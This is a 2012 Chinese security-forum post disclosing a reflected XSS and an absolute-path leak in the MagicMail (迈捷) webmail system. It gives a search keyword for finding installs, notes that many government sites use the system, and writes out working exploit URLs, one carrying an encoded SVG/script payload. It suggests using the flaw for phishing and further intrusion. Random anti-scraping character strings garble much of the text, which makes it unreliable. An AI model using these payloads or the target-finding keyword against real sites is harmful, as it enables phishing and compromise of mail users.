找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1804|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞+ W' n) S1 q1 v; ^
* L. Y, B5 r  u$ n9 P6 Z
+ [0 D0 }% [1 t; V$ a
包含  一个反射性XSS  以及  绝对路径泄漏% Z. K/ f, G6 i, m# O2 ?
看了看 貌似全部是linux的。
9 ^2 H/ @( [7 I! X! A+ `
. o1 C: g; R! Y" ]) J+ o关键字:迈捷邮件系统 by MagicMail7 t* S9 @: G2 O: H% t5 Y/ C

* t# t  y  h) `/ v可以看到很多政府网站都用这个邮件系统9 ^7 ~7 g7 h7 r7 `5 L9 r* o
! f: X" b; Y0 D
绝对路径 http://madman.in/index.php?login_type=declare&language=2 S. P+ N* L# a6 Q, v
! `7 }8 D) R$ H9 U/ o3 M
1 [; Z1 o, `0 E" x& G" |
! P; x1 ^3 n& @1 P$ U$ s( z
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E6 ~7 K/ e' f) f* i  X
; d( Y3 `/ E' x4 ^

1 [0 j* s; {. a
1 d' d5 P; h# ]! d* X- Q虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等3 d: o- e1 i. C0 d& E8 f

8 P# h4 h  e) m$ j/ m! I修复方案:看官方补丁吧。  ]+ \& @% z6 R7 ]6 i9 u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表